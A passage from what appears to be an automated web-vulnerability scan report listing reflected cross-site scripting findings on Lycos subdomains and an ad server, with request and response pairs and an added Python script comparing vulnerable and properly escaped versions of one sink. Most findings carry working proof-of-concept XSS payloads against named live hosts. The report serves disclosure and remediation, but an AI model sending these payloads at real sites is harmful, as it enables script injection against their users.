HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:10 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:11 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 46916
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&61e95"style="x:expression(alert(1))"a787e8b7cfe=1"> ...[SNIP]...
3.48. http://deals.lycos.com/deals/stores/ebay-50 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/stores/ebay-50
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf14a"style%3d"x%3aexpression(alert(1))"366512bb10b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf14a"style="x:expression(alert(1))"366512bb10b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/stores/ebay-50?bf14a"style%3d"x%3aexpression(alert(1))"366512bb10b=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:06 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:06 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47834
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&bf14a"style="x:expression(alert(1))"366512bb10b=1"> ...[SNIP]...
3.49. http://deals.lycos.com/deals/stores/itunes-music-store-1414 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/stores/itunes-music-store-1414
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13c84"style%3d"x%3aexpression(alert(1))"9dccb822702 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 13c84"style="x:expression(alert(1))"9dccb822702 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/stores/itunes-music-store-1414?13c84"style%3d"x%3aexpression(alert(1))"9dccb822702=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:13 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:13 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 44865
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&13c84"style="x:expression(alert(1))"9dccb822702=1"> ...[SNIP]...
3.50. http://deals.lycos.com/deals/stores/walmart-321 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://deals.lycos.com
Path: /deals/stores/walmart-321
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0561"style%3d"x%3aexpression(alert(1))"97f7932e4ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a0561"style="x:expression(alert(1))"97f7932e4ff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated here uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /deals/stores/walmart-321?a0561"style%3d"x%3aexpression(alert(1))"97f7932e4ff=1 HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:46 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:46 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 47100
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="?pn=2&a0561"style="x:expression(alert(1))"97f7932e4ff=1"> ...[SNIP]...
The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4a5a5'%3balert(1)//7777e16fd16 was submitted in the redir parameter. This input was echoed as 4a5a5';alert(1)//7777e16fd16 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ptj?member=311&inv_code=cm.idg_b2c&size=728x90&referrer=http%3A%2F%2Fshopping.lycos.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.idg_b2c%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-6268295_1292163909%2C%2Cshop%2C%3B%3Bcmw%3Dowl%3Bsz%3D728x90%3Bnet%3Dcm%3Bord1%3D980870%3Bcontx%3Dshop%3Ban%3D{PRICEBUCKET}%3Bdc%3Dd%3Bbtg%3D%3Bord%3D5266572%3F4a5a5'%3balert(1)//7777e16fd16 HTTP/1.1 Host: ib.adnxs.com Proxy-Connection: keep-alive Referer: http://shopping.lycos.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: uuid2=1253520181866309356; icu=EAAYAA..; acb244106=5_[r^kI/7ZI!97E0nf8MG#ngg?enc=AAAAgJF74D-amZkZOavdPwAAAKCZmQlAmpmZGTmr3T8AAACAkXvgP4AtEUe-YV1k7KbsxvZlZREt2wRNAAAAALk6AwA3AQAAZAAAAAIAAADQvgEAAQAAAFVTRABVU0QA2AJaAKoBAABqBwICBQIFAAAAAADrHzp9&tt_code=cm.idg_b2c&udj=uf%28%27a%27%2C+27%2C+1292163885%29%3Buf%28%27r%27%2C+114384%2C+1292163885%29%3Bppv%2882%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2884%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2811%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2882%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2884%2C+%277232044046490873216%27%2C+1292163885%2C+1302531885%2C+17328%2C+21790%29%3Bppv%2887%2C+%277232044046490873216%27%2C+1292163885%2C+1292250285%2C+17328%2C+21790%29%3Bppv%28619%2C+%277232044046490873216%27%2C+1292163885%2C+1292250285%2C+17328%2C+21790%29%3Bppv%28620%2C+%277232044046490873216%27%2C+1292163885%2C+1292250285%2C+17328%2C+21790%29%3Bppv%28621%2C+%277232044046490873216%27%2C+1292163885%2C+1292250285%2C+17328%2C+21790%29%3B&cnd=!QE6xsQiwhwEQ0P0GGJRvIJ6qASgAMfylRX2Se-A_QhMIABAAGAAgASj-__________8BQhMICxAAGAAgAyj-__________8BQgwIUhD89iMYBCADKAJC
EwhTEAAYACACKP7__________wFCDAhUEJ35GhgGIAMoAkITCFUQABgAIAIo_v__________AUITCFYQABgAIAIo_v__________AUITCFcQABgAIAMo_v__________AUgDUABYqgM.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E17328; sess=1; anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTSHJTy]F]k($WNwJP'.<5sLEKRldcpNp)Ec(kJ6st'z3Uv2?!F?0<:.kuRsX$mCQui>4M`J`y*aOn9LJHv?jDa''Df?dw]@K3NPeORWrK5v*s0045+'v.Jg1BCTjbtb.(7Yo>`<xZkofNI5StD5bqM=kN.BbMwKNO7wJ?G+_W?^@>wr?4/0viQZwz3N4Erbd<u$`O`Fg>TW*rP!?5iWVO-@k
Response
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 13-Dec-2010 14:28:36 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb244106=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: icu=EAAYAA..; path=/; expires=Sat, 12-Mar-2011 14:28:36 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: acb7262=5_[r^kI/7ZI!97E0nf8M>yz4N?enc=AAAAgJF74D-amZkZOavdPwAAAKCZmQlAmpmZGTmr3T8AAACAkXvgPwols7zZIRBB7KbsxvZlZREU3ARNAAAAALk6AwA3AQAAZAAAAAIAAADQvgEAAQAAAFVTRABVU0QA2AJaAKoBAABqBwICBQIFAAAAAADXH3V5&tt_code=cm.idg_b2c&udj=uf%28%27a%27%2C+27%2C+1292164116%29%3Buf%28%27r%27%2C+114384%2C+1292164116%29%3Bppv%2882%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2884%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2811%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2882%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2884%2C+%274688284431150163210%27%2C+1292164116%2C+1302532116%2C+17328%2C+21790%29%3Bppv%2887%2C+%274688284431150163210%27%2C+1292164116%2C+1292250516%2C+17328%2C+21790%29%3Bppv%28619%2C+%274688284431150163210%27%2C+1292164116%2C+1292250516%2C+17328%2C+21790%29%3Bppv%28620%2C+%274688284431150163210%27%2C+1292164116%2C+1292250516%2C+17328%2C+21790%29%3Bppv%28621%2C+%274688284431150163210%27%2C+1292164116%2C+1292250516%2C+17328%2C+21790%29%3B&cnd=!QE6xsQiwhwEQ0P0GGJRvIJ6qASgAMfylRX2Se-A_QhMIABAAGAAgASj-__________8BQhMICxAAGAAgAyj-__________8BQgwIUhD89iMYBCADKAJCEwhTEAAYACACKP7__________wFCDAhUEJ35GhgGIAMoAkITCFUQABgAIAIo_v__________AUITCFYQABgAIAIo_v__________AUITCFcQABgAIAMo_v__________AUgDUABYqgM.&custom_macro=ADV_FREQ%5E0%5EREM_USER%5E0%5ECP_ID%5E17328; path=/; expires=Mon, 13-Dec-2010 14:28:36 GMT; 
domain=.adnxs.com; HttpOnly Content-Type: text/javascript Date: Sun, 12 Dec 2010 14:28:36 GMT Content-Length: 365
The value of the cat request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9c59d"><script>alert(1)</script>b1e138b458a was submitted in the cat parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=multi&cat=images9c59d"><script>alert(1)</script>b1e138b458a HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:05 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:05 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16105

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info</title
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_images9c59d"><script>alert(1)</script>b1e138b458a&utm_campaign=home_mail&utm_medium=networkbar">
...[SNIP]...
The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a4a7"><script>alert(1)</script>abc7cf3bcbf was submitted in the tab parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?tab=multi5a4a7"><script>alert(1)</script>abc7cf3bcbf&cat=images HTTP/1.1
Host: info.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=144054893.1292163878.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=144054893.1098995657.1292163878.1292163878.1292163878.1; PENTA=174.121.222.18.1292163893857460; __utmc=144054893; __utmb=144054893.3.10.1292163878;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:34:04 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:04 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info</title
...[SNIP]...
<a href="http://mail.lycos.com/?utm_source=lycostab_multi5a4a7"><script>alert(1)</script>abc7cf3bcbf&utm_campaign=home_mail&utm_medium=networkbar">
...[SNIP]...
3.54. http://info.lycos.com/tos.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://info.lycos.com
Path: /tos.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 327d3"><script>alert(1)</script>739d92ba30c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. In this instance the payload is carried as extra path information after /tos.php rather than in the query string, and the page reflects the full request path into the href of its "acceptance" anchor, so no named parameter is needed to reach the sink.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tos.php/327d3"><script>alert(1)</script>739d92ba30c HTTP/1.1
Host: info.lycos.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; __utmz=207906063.1292163855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.657386894.1292163855.1292163855.1292163855.1; __utmc=207906063; __utmb=207906063.1.10.1292163855; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; PENTA=174.121.222.18.1292163891850882
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:28:16 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:28:16 GMT; path=/
P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 91442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Lycos Info - Term
...[SNIP]...
<a href="/tos.php/327d3"><script>alert(1)</script>739d92ba30c#acceptance">
...[SNIP]...
3.55. http://jobs.lycos.com/search [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jobs.lycos.com
Path: /search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ade7"style%3d"x%3aexpression(alert(1))"6cec803882f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ade7"style="x:expression(alert(1))"6cec803882f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (other browsers do not implement CSS expression(), and IE8 and later disable it in standards mode), and may not work on other browsers. Two details matter beyond the IE-specific sink: the server URL-decoded %3d and %3a before echoing, which is why the payload is reported as echoed as a transformed value rather than unmodified; and the double quotation mark is reflected without HTML encoding, so the attribute can be terminated in any browser. Filtering angle brackets alone would not fix this sink.
Request
GET /search?2ade7"style%3d"x%3aexpression(alert(1))"6cec803882f=1 HTTP/1.1
Host: jobs.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R1161724686; path=/
Date: Sun, 12 Dec 2010 14:34:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: LycosJobs=num82irdh4ljeo4nnvsi6bqqo5; expires=Sun, 12 Dec 2010 15:34:34 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:34 GMT; path=/
Set-Cookie: diktfc=20F93AF4482D6F2C33F3F1B215794291BCD892461E6A; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/; domain=.lycos.com
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62453

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/jobs/search?pn=2&2ade7"style="x:expression(alert(1))"6cec803882f=1&q=">
...[SNIP]...
The value of the x request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b25f3"style%3d"x%3aexpression(alert(1))"8e6083360e1 was submitted in the x parameter. This input was echoed as b25f3"style="x:expression(alert(1))"8e6083360e1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (IE8 and later disable expression() in standards mode), and may not work on other browsers. As with the previous instance, the unencoded double quotation mark in the reflected value is the underlying defect: it terminates the attribute in any browser, so the finding is not limited to IE even though this particular payload is.
Request
GET /search?x=1b25f3"style%3d"x%3aexpression(alert(1))"8e6083360e1 HTTP/1.1
Host: jobs.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Set-Cookie: CORE-STICKY=R1161729042; path=/
Date: Sun, 12 Dec 2010 14:34:36 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: LycosJobs=4dq7os30hes5qg14m1sf1m0oc1; expires=Sun, 12 Dec 2010 15:34:36 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:34:36 GMT; path=/
Set-Cookie: diktfc=FA178DC2496B1980044763822ACABD48B570396C18E7; expires=Tue, 19-Jan-2038 03:14:07 GMT; path=/; domain=.lycos.com
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 62539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...
<a href="/jobs/search?pn=2&x=1b25f3"style="x:expression(alert(1))"8e6083360e1&q=">
...[SNIP]...
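The findings above all share one sink shape: attacker input lands inside a double-quoted HTML attribute, and the scanner proves it by wrapping a payload in random hex canaries and checking whether the reflected text still contains the quote that terminates the attribute. The following is an added example written for this page, not code from the scan report or from the Lycos sites. It reconstructs a hypothetical version of the info.lycos.com utm_source sink in three variants (raw echo, an angle-bracket-only filter, and proper attribute encoding) and runs both payload families seen in this section against each: the tag-closing `"><script>alert(1)</script>` form and the Internet Explorer `"style="x:expression(alert(1))"` form. The render_* functions, LINK_TEMPLATE and the canary lengths are assumptions for illustration.

```python
"""Verify a reflected-XSS finding in a double-quoted HTML attribute.

Added example; not code from the original scan report or the scanned sites.
LINK_TEMPLATE is a hypothetical reconstruction of the info.lycos.com sink
(utm_source inside <a href="...">), and the three render_* functions are
hypothetical server-side variants written to contrast a raw echo, an
angle-bracket-only filter and correct attribute encoding.
"""
import html
import re
import secrets

# The two payload families the scanner used on this page: a tag-closing
# <script> injection and the Internet Explorer-only CSS expression() form,
# which contains no angle brackets at all.
PAYLOADS = {
    "script_tag": '"><script>alert(1)</script>',
    "ie_expression": '"style="x:expression(alert(1))"',
}

LINK_TEMPLATE = ('<a href="http://mail.lycos.com/?utm_source=lycostab_{value}'
                 '&utm_campaign=home_mail&utm_medium=networkbar">')


def render_vulnerable(value):
    """Raw concatenation into the attribute (the behaviour the report shows)."""
    return LINK_TEMPLATE.format(value=value)


def render_angle_filter(value):
    """Insufficient fix: strips < and > but leaves the closing quote intact."""
    return LINK_TEMPLATE.format(value=value.replace("<", "").replace(">", ""))


def render_hardened(value):
    """Correct fix for this context: HTML-encode, including the quote character."""
    return LINK_TEMPLATE.format(value=html.escape(value, quote=True))


def make_probe(payload):
    """Wrap the payload in random hex canaries, as the scanner's
    9c59d...b1e138b458a markers do, so it can be located in a large body."""
    prefix, suffix = secrets.token_hex(4), secrets.token_hex(4)
    return prefix + payload + suffix, prefix, suffix


def _reflected_span(body, prefix, suffix):
    """Text between the two canaries in the response, or None if absent."""
    m = re.search(re.escape(prefix) + "(.*?)" + re.escape(suffix), body, re.S)
    return m.group(1) if m else None


def classify_reflection(body, prefix, payload, suffix):
    """Return ('unmodified' | 'modified' | 'absent', reflected_text), mirroring
    the report's "echoed unmodified" versus "echoed as ..." wording."""
    reflected = _reflected_span(body, prefix, suffix)
    if reflected is None:
        return "absent", None
    return ("unmodified" if reflected == payload else "modified"), reflected


def breaks_out_of_attribute(body, prefix, suffix):
    """True if a literal double quote survives in the reflected span: the
    attacker can then terminate the attribute whether or not angle brackets
    were filtered (for example by injecting an event-handler attribute)."""
    reflected = _reflected_span(body, prefix, suffix)
    return reflected is not None and '"' in reflected


def assess(render, payload_name):
    """Run one payload family against one server variant and summarise."""
    payload = PAYLOADS[payload_name]
    probe, prefix, suffix = make_probe(payload)
    body = render(probe)
    verdict, reflected = classify_reflection(body, prefix, payload, suffix)
    return {
        "verdict": verdict,
        "reflected": reflected,
        "breaks_out": breaks_out_of_attribute(body, prefix, suffix),
    }


if __name__ == "__main__":
    for render in (render_vulnerable, render_angle_filter, render_hardened):
        for name in PAYLOADS:
            r = assess(render, name)
            print(f"{render.__name__:20} {name:14} {r['verdict']:10} "
                  f"breaks_out={r['breaks_out']}  reflected={r['reflected']!r}")
```

The angle-bracket filter is the case worth studying: it changes the script-tag payload (so a naive "echoed unmodified" check would report it as fixed) yet leaves the IE payload untouched and leaves the quote intact in both, so the attribute still breaks out. Only the `html.escape(value, quote=True)` variant turns `"` into `&quot;`, which is the property a retest should assert on for an attribute-context sink.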
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10fbb"><script>alert(1)</script>21f65dae1a0 was submitted in the bgColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
